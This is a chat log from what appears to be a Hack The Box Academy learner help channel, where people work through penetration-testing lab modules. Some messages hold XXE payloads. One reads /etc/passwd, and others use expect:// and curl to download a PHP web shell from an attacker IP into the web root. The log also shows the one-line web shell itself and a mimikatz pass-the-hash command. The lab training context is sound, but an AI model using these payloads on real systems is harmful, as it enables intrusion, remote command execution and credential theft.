hi everyone, what is the best way to know what kind of query is used on the backend database to input or retrieve data when testing for SQL injection. For example if i know this how a login page retrieves credentials (SELECT * FROM login WHERE username = 'tom' AND password = 'some';) to authenticate a user I can manipulate it in various ways

It depends. In Password Attacks, rockyou is actually always the wrong list. There, the list provided in the module or the list created in the module is the correct list.

I see.. alright thanks man

so thats why its been taking hours already and rockyou cannot cracked the unshadowed file

Knowing the code is actually only possible with a Withebox Pentesting.

thanks

Hi guys, I'm stuck with DNS submodule in Attacking Common Services. Do you have any hint about it?

What is not working?

The official hint recommends to use the subbrute script, but I don't know how to build the arguments neither ./names.txt nor ./resolvers.txt 😔

check the section again, it is described

Hi, doing the wi-fi penetration testing basics module, and have a question regarding the wireless interfaces. Section "wi-fi interfaces", one of the questions is how many wifi networks are available. I noticed a difference in response between piped and not piped output of iwlist wlan0 scan, can someone explain why that is?
Example output:

wifi@WiFiIntro:~$ iwlist wlan0 scan
wlan0     No scan results

wifi@WiFiIntro:~$ iwlist wlan0 scan |  grep 'Cell\|Quality\|ESSID\|IEEE'
          Cell 01 - Address: D8:D6:3D:EB:29:D5
          ...SNIP...

Connected with xfreerdp if it matters.

Are you still stuck on this one?

resolvers.txt must contain your target IP

hello can anyone help me in Attacking Wi-Fi Protected Setup - Skills Assessment What is the WPS PIN for the WiFi network named HackTheBox-Corp? i try all the possible attack and not working

Ty for the clue, I'll try to take a closer look at the chapter again as facsmilae said. thx again!

What are the new T3 defensive modules about is there a CDSA Pro cert dropping in future ?

Nothing has been announced yet. But the fact that HTB earns money with these certificates and now offers Tier III modules for Blue Teams suggests that there will also be a Blue Team Tier III certificate in the future. Tier III certificates have been published or at least announced for Web and AD. It would therefore only be logical to also have a Blue Team certificate at this level.
But as I said, nothing has been announced and is therefore pure speculation

Thanks I was assuming something like that

Finally nailed Lateral Movement Module Skills Assessment! ... it was... an absolute mission

It Turned out i was in rabbit hole

lol its so annoying when that happens, hope i was of help

Yeah you helped, this situation also learned me something

yeah man they do put rabbitholes often like that im struggling myself rn for a while with an assessment and i cant figure it out

Need help with Perm Escalation

awesome

what module is that

Not a module

its getting started

awesome

where're you stuck at?

I got first flag trying to get second i need to escalate to root access

the machine is 6.1.0-10 linux kernel

but i cant find any exploits for this version

its been a really long time... but iirc there was a script in that module]

starts with l

you're going to run it

where the script

an enumeration script

a quick google search says "LinEnum"

Do i have to run a reverse shell and then run the command thru my reverse shell?

its been a really long time but iirc that module also walks through file transfers between hosts

so follow the steps to transfer the enum script from your host to the target machine

Had nothing to do with enumerating lol you tossed me in the complete different direction

Simply just had to copy the pub rsa token from the root & copy it over to my terminal and login with it as the root user

well next time pay attention to the module

Don't give the wrong advice maybe just be quiet

theres no such thing

wrong advice is just creative reinterpretation

Very much so a thing

You're telling me to enumerate with a script when i can't even install a script let alone move anywhere in the machine without root access

and in my defense i havent done that module

You're a funny troll

next time say thank you

Yes I am still stuck I don't know how to find product id

You can send me a DM.

Hi everyone, I'm doing the SMB Footprinting lab. I'm stuck at the 3th question (Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer.).
I am using the pwnbox. I try to run CrackMapExec, but when I do that I get -bash: cme: command not found. I tried to install crackmapexec from source but that did not work. Anyone has any idea if it is also possible without crackmapexec?

hello can anyone help me in Attacking Wi-Fi Protected Setup - Skills Assessment What is the WPS PIN for the WiFi network named HackTheBox-Corp? i try all the possible attack and not working

use netexec, crackmapexec has been deprecated since the module was written. An update is apparently underway

same commands, just replacing the name

I just found the answer with rpclient 🙂
thnx for helping!

I asked yesterday, could anyone take just a quick look at this? I really can't figure out the problem, please and thanks.

No

Hi all! I hope you're all doing good.

I'm stuck at "Understanding Log Sources & Investigating with Splunk" module. The questions about the IP addresses of the C2 servers.

Can someone help ? a little nudge ?

Module: WinPrivEsc
Section: DNSAdmins
Any alternative ways of building dlls other than legacy VisualStudio?
msfvenom isn't doing great, but I couldn't have VisualStudio target the correct legacy version of various codes to build the revshell dll plugin for the DNS server (It can't even complete the build)

The way of the exploit works is interesting
But it is tough af to build a working one (without blowing the dns server up)

im also looking at ||Ippsec's resolute walkthrough|| and tried to replicate his way...
Sadly ms doesn't seems to release alot of those legacy visualstudios

I went through the section via msfvenom luckily
gotta learn more about more building dlls, or even just c++

Hello! Looking for some help on the Login Brute Forcing -Brute Force Attack module. Ran the python script to obtain the pin and flag. I went through 0000-9999, no hits. Checked the walkthrough guide and the flag isn't given.

check IP address and port number within the script

it's not actually going to take this long right

thats how long it will take to try all passwords, hopefully it is done faster

ok how am i supposed to do this then because the lab only stays open for 6 hours max and this is 180k passwords

i can't make hydra go any faster

medusa is slow as shit as well

oh wait i have an idea

Can anyone help me with the linux fundamentals please. I am having a very hard time

you can look into increasing the amount of threads, but expect it to not take the whole time but finish after 5-10% of the passwords

you can also split the wordlist into smaller ones and try them one at a time (for example try all 8 character pws first, then all 9 character ones, etc)

yep just did that

well i just split them evenly into 10 wordlists but either way that's what i meant by this

You figure out your issue? I think I have the same problem because I can't seem to submit the correct answer either.

For the Linux Privilege Escalation module, specifically the Environment Enumeration one could use a bit better explaining on what the question is asking for tbh

Idk if its the right place to ask it, im doing the web attacks module and i dont understand too much about the local file disclosure, i tried with the http python server but in BurpSuite i cant see the response from the server or its empty

i mean with xxe

Hey, im in sqlmap essetials / OS Exploitation.. the qusteion is "Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host. " i get a os-shell and can see all the files, the flag.txt is the same for the qousteion before and iv looked at all other files in /var/www/html but i cant finde the flag.. the hint is: The flag is in a very common directory! but it is hjust one dir inside and it is empty, i cant go to any other dir.. so what im doing wrong?

check root dir

what?

cant get to it.. just saying: No output or ommand standard output: 'sh: 1: cd: can't cd to root'

I mean, in one example the module tells you to create a local dtd file so the server can reference it through a curl but when i do it the response from the server came empty

what user do you have? run whoami

im www-data

dtd file sounds like xxe no?

Yep xxe

what is your payload

try to run find / -name "flag.txt" 2>/dev/null xD

done it already

No output

try upgrade your shell

i cant do it ..

nothing works

does the server have python?

<!DOCTYPE email [
<!ENTITY % begin "<![CDATA[">
<!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php">
<!ENTITY % end "]]>">
<!ENTITY % xxe SYSTEM "http://10.10.14.127:8000/xxe.dtd">
%xxe;
]>

The ip is just a placeholder

its been a while since i did xxe right, but arent you supposed to reference a local dtd file?

Yep, the local is suppouse to contain this: <!ENTITY joined "%begin;%file;%end;">

yes.. i can do another rev-shell but is not what this questions tells me to do, and i get the files in www/html like i meant do.. i think something is wrong...

Hey could someone help me with the intro to windows evasion static analysis section i encode a payload using aes encryption through cyber chef but usinh the decoding code given in this secrion what will be the key to decrypt it

<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
    <!ENTITY % constant 'aaa)>
            <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
            <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///patt/&#x25;file;&#x27;>">
            &#x25;eval;
            &#x25;error;
            <!ELEMENT aa (bb'>
    %local_dtd;
]>

what happens if you do this?

i did find / -name "flag.txt" 2>/dev/null and it is just /var/www/html/flag.txt so.,..

then cat it?

cat /var/www/html/flag.txt

like i tell you before, it is wrong flag, it is the flag for question 1--

im not stupid

i know how to read the flag

if find dosent find any more flags, i think your out of luck no?

Reset the box, ive had to do that on occasion when something that should work doesnt tbh

why you think im saying something is wrong?

im not, im saying you sound like you are out of luck.

hehe

im going to try it

thanx, going to try.. it happens some times some strange problems ..

It might not be called flag.txt, I’ve found that some flag files have random strings on the end.

Try updating your find command to look for -iname “flag*.txt”

How to check DNS of a website

by the way i dont understand it too much, i just got to the xxe topic 😅

dig or nslookup

grep -ir flag*.txt or just grep -ir *.txt to find all .txt files from root path

Yes, there are multiple ways to search for the file.

Issuer means what

You’ll want a -l on this so it restricts to filenames only and not file contents.

Hey could someone help me with the intro to windows evasion static analysis section i encode a payload using aes encryption through cyber chef but usinh the decoding code given in this secrion what will be the key to decrypt it

srry i just realized the one i was trying was the local one:
<!DOCTYPE email [
<!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'OUR_IP/shell.php'">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>

and this is the content of the "shell.php: '<?php system($_REQUEST["cmd"]);?>'

the shell is not good.. cant use grep, cant use cd etc...

get a better shell

ok i see what you are trying to do, do you host your shell on a local web server? does your payload connect? do you see a callback?

It is the only way, but the question tells me to use --os-shell from sqlmap, so it is what i supose to use, not another shell

hacking the challenge is allowed.. you are training to be a hacker no? why not just solve the challenge any way possible? thats what a hacker would do right? the challenge is not to do what you are told, the challenge is to pwn the server..

no reason to follow the rules mate

Sure sure, done it before so why not.. i know, it is about to solve it, and no matter how...

attaboy

my shell is on the local web server because i tested the link with the vpn ip and i see the callback with a 200 OK response from the server but i dont know how to put a command because the shell.php dont have a command inside like ls or whoami

ok so what you need to do is you need to navigate to the webserver and write ?cmd=whoami

you are uploading a php web shell using your xxe payload

so you need to execute server side commands using that webshell

<?php system($_REQUEST["cmd"]);?>'

it will not have a gui, it will only output raw cmd responses

you managed to do it? I havent seen any response from server while trying to do this thing

Im just about to try it again

use the browser to go to http://TARGET_IP.whatever/php.shell?cmd=whoami or something liek that, whatever the domain is and path

if you see a 200 OK the webshell is downloaded

i was about to ask about one method of advanced xxe that doesnt seem to work but i saw your thread 😄

if its on the root folder would be like http ://1.1.1.1/shell.php?cmd=whoami ?

i guess, is there anything there?

nope, im going to try with php.shell instead of shell.php

yea, you need to use whatever your webshell is named

if you named it thomas-the-tank-engine.php you need to call that 😛

hahaha i mean its called shell.php but its still not working

Then you may be doing something wrong

yea

are you certian you got the server to download the webshell from your web server?

i guess not, i got a 404 when i enter the http://ip/shell.php

yea then its definetly not on that location or not downloaded at all

but the link to the shell in the payload is correct and i send it multiple times

what does your webserver say when you upload your xxe payload..
also i recommend using a arb file read xxe payload instead of a download payload at stage one, just to confirm that your xxe payload actually works.

Ah doing xxe

if you can read /etc/passwd, you know you have xxe for sure. then you can start doing file download after.

yea its local dtd file inclusion for xxe

i tested with other values than the "curl" command and it work the "company" and that worked

the company variable i mean

Id reread how the dtd works

dtd is just the file reference

i can read /etc/passwd but i cant do the webshell i guess

And understand why company works

i the xml i put the "&company;" and i can read passwd but i dont download the payload i think

Hey guys I am seeking help in the Intro to Assembly skill assesment

you run a python web server in the same folder as your shell.php file right?

Is anyone having issues trying to connect to the HackTheBox website itself? I can connect to everything besides the website on my VM and host OS.

yep, and it get download when i enter the ip:server_port/shell.php in my browser

Connect to any other website I mean

the shell.php should then land somewhere on the server and you should be able to connect to it i suppose

should i try fuzz directories till i find the shell.php in the webserver to be sure that got uploaded?

yea you can try that

I don't recall needing to upload a shell

But it's been a minute

i dont understand that either, why not jsut read flag file

also, with curl you might be able to determine the output folder

you could also try wget instead

wget -P /var/www/html $url

That module was a blur

curl -o /var/www/html $url should work too

<!DOCTYPE email [
  <!ENTITY company SYSTEM "expect://curl$IFS-o$IFS/var/www/html/shell.php$IFS'OUR_IP/shell.php'">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>

Were you able to find that second flag?

No, im trying to upload another shell with --file-write like it says in module but i cant get it working.. Im not giving up, but i think the solution is more simple then what im doing now..

Just list out /

See if anything is there.

says No output

Try to list it out with more than just ls

get some dirs but but cant get in , all is root im www-data

Can you DM your output?

sure

I've never wanted a module to end faster than the windows privesc module

I´ve tried a lot and still not working, tomorrow i´ll keep trying but still thanks for your time :33

Hi anyone tried MonitorsThree htb

My honest reaction to the facts presented above 0:20 & 0:40 https://music.youtube.com/watch?v=7NMyvtUu9-A&feature=shared

when a module says "1 Day" (work day?) to complete, does that mean 8 hours or 24 hours?

I think every module took me longer just based on my note taking.

8 hours

Equate 1 day to working day

an 8 hour module can be done in 4 hours honestly

assuming you dont run into toruble

Hey Jeff, I have been working with this module for some time now.. And it seems that im stuck here aswell. Can I talk to you for some guidance on this?

Thanks

Where are you running into issues?

Not password attacks 😭

bro

lol

an 8 hour module will be done in more than 8 hours 👍

Right now I am cheating in the privesc module idc anymore

instead of doing the things in the section im skipping and just using a previous exploit xD

stealing SAM

1 method to get it done faster

lol ill come back someday im sure, but the title of the section is Miscellaneous techniques

who got it before me? 😂 😂 😂 😂

I am tired of reading the word miscellanous

at this portion of the module, the given script has a small bug i think. At least for me did not worked "out of range error". I had to manually fix it. Lost some time there

@everyone

Oh I’ll definitely be taking more than the projected time lol. I’m considering doing the modules twice even depending on how much I struggle. Just wanted to know what exactly I’m up against when the 1-2 day modules start.

on Access Control List (ACL) Abuse Primer i am on the last question and i feel getting it correct is just the way its worded. I know the answer but not how htb wants it put into the space. anyone have any insight

Does Ad module take 7days

Actually?

no

by the way a tip on the final assessment, use lazagne.exe . That one little thing kept me from progressing for 5 days.

youll know when to use it

Thanks havent started it saw 7days and I was like oh boy

that's nothing compared to the windows privesc

windows privesc is now officially driving me insane

We ll make it out brah

😭

Yes, it seems to not work. I'll patch in a few.

You were definitely the first one to finish the module, the other guy was from the academy team itself 🙂

My trying to survive at password attacks final labs 💀

oh man wait till you have to leverage a command injection vulnerability just to get in

i finally reached the first assessment after several days

hi folks

on the crackmap exec module. May i please get some hint on this question: **Up to how many RIDs does --rid-brute list by default? **

I tried several combinations of || --help || with main command and none is showing any default value.

can anyone help me

im actually going insane

ask the question

windows fundamentals module, when i try to RDP to it, as its asking, iot says the system is offline

have you restarted the machine

what machine?

like reset the target machine?

yes

ill try that rn

still nothing, this is what i get,

what section

introduction to windows

try the pwnbox

worked fine for me

bruh

remove the space for the user and password , add a : for the ip

just use xfreerdp at the start

what is the priks thing?

idk its the code that the lesson told me to paste in

remove the spaces and add the : for /v

wrap your password

the section shows the exact command

xfreerdp /v:<targetIp> /u:htb-student /p:Password

what is the COM port for juicy potato?

Oh, man! Another module!

broooo it was the $ 0_0

lmfao

wait nvm

its still fcked

There's a lot wrong there with your command. "xfreerdp" is the command it should start with, not the "priks" part.

im using this now: xfreerdp /v:10.129.75.12 /u: htb-student /p: Academy_WinFun!

comes back as an error Invalid sigil

As TLattice said, remove the space

You still have a space before the password

and username

oh i thought you meant before the xfreerdp

k thnx

you shouldn't have any extra spaces

only use a single space to separate the command, parameters, and values

my goats

thanks for baby walking me

The skills assessment for Windows privesc module is fun.

but the rest of the module is such a snorefest.

goodmorning guys

🤣

Windows Privesc done! Alright I never wanna see windows again thank you.

After performing a zone transfer for the domain inlanefreight.htb on the target system, how many DNS records are retrieved from the target system's name server? Provide your answer as an integer, e.g, 123.
I would like to know what would be the command

the module/section didn't go over it?

stuck in zone transfer segment of Information gathing web edition

yah there was one command but I tried it all the ways i could. but couldn't find the answer

so you ran the command successfully and got the results but were unable to count it? not sure what you mean here

There may be another zone to transfer to and add

yah I ran over the command. But couldn't count

One more thing is : I'm not quite sure about the command.

dig axfr domain.tld @\nameserver/IP

yah it worked

I ran this command but my position was different

I used ip address firstly & then used the domain

that's why it didn't show up ig

do it like the section shows, the nameserver comes after the @. in marcielee's example the 'domain.tld' is the target domain

hello can anyone help me in Attacking Wi-Fi Protected Setup - Skills Assessment What is the WPS PIN for the WiFi network named HackTheBox-Corp? i try all the possible attack and not working

What is wrong with this command? sekurlsa::pth /user:david /rc4:c39f2beb3d2ec06a62cb887fb391dee0 /domain:INLANEFREIGHT.HTB /run:cmd.exe it spawns a cmd then I check the user and it is still administrator on ms01 instead of david

https://academy.hackthebox.com/module/147/section/1638

Pretty sure that’s how it works

yeah I know right? Wonder whats wrong with it

You should still have the rights David tho

You can’t list the David shares?

I think ill be able to list david shares once I connect to the domain controller as david and do dir\\dc01\david

I wont be able to list david shares while Im on ms01 and logged in as administrator right?

You are admin with David’s rights now

Administrator and David is two different accounts

what do you mean by this?

Have you tried listing the share

Access is denied.```

I am currently logged in as Administrator on MS01, I think I wont be able to list David's share if Im not connected to DC01 right?

is DC01 accessible externally or it can only be accessed by the MS01?

You are on a domain joined machine

I guess I am. Again, currently logged in on the MS01 as Administrator account.

its spawns a CMD. I check using whoami and find out the current user is still Administrator and the machine still on MS01

It’s still gonna say that you’re admin but you will also have David’s domain rights

Bro. You're mixing things up.

They show the same example in the section with julio

They are still admin but can list shares

I run the command as Administrator like I said. The command was supposed to connect to DC01 as user David.

hmm okay.

ill see what I can do

I just did it no problem

I’m still the admin user, I just have David’s rights

oh I see

can you list dir \\dc01\david ?

Go look at the julio example again

Yes

ah yes finally

thanks @safe star and @boreal kelp

this is the case. Was confused on the spawned CMD because whenever I check its still shows MS01 and the user is still Administrator

was able to list now the dc01

careful not to reveal spoilers

oh my god apologies for that

alright @cloud urchin

Hi guys,
I am doing the AD Enumeration & Attacks - Skills Assessment Part II

For the 8th question: Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host. I get the following hash for Administrator. But when i do use it to login, it doesn't work. Am i doing anything wrong here?

Have you tried local auth

how are u logging in

yeah try local-auth

careful to not spoil contents of the skill assessment like that

bro typed the hash 💀

my bad

What are the best & most helpful & most in-depth books you all would recommend on ethical hacking?

Are Peter Kim's books any good?

i wouldn't. i'd recommend htb's academy. peter kim's books are great but they're pretty dated.

that's the problem with books vs online platforms that can keep up

I'm trying to do SQL Injection Fundamentals but I'm getting this error when attempting to connect to the mysql database
mysql -u root -h 94.237.59.207 -P 42397 -p 1 ↵ mysql: Deprecated program name. It will be removed in a future release, use '/usr/bin/mariadb' instead Enter password: ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it

try --skip-ssl

It works

./kernal_exploit3: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./kernal_exploit3)
why m i getting this error while solving the LPE kernal exploit module.

anybody?

the program you are trying to run is compiled in a way that it looks for the needed library (GLIBC_2.34 in this case) on the machin where it is executed. In your case the program was compiled on a machine that has GLIBC_2.34, but executed on a machine that doesn't have GLIBC_2.34 installed. You either need to compile it on the machine where you want to execute it, compile it on a machine that has the same version of GLIBC_2.34 as the target machine or compile it staticallly linked, which means the program includes all the libraries it needs (but the filesize is then ofc bigger).

I think in academy they expect you to build the exploit on the target machine

whats the command to view a txt file on windows? like "cat" on linux

Type

One google search would’ve told you that 🙃

i tried it, didnt work for me

Then maybe you don’t have perms to read

10/18/2021  12:52 PM                14 flag.txt
               1 File(s)             14 bytes
               0 Dir(s)  30,582,730,752 bytes free

C:\>Type 14 flag.txt
Type 14 flag.txt
The system cannot find the file specified.
Error occurred while processing: 14.

flag.txt```

🥲

It’s type flag.txt, not type 14 flag.txt

ye ik i tried that

tried with 14 cuz flag.txt alone didnt work

nvm got it lol

🥲

i compiled it in my host only then i transfered it to target machine but its showing unmatched library erro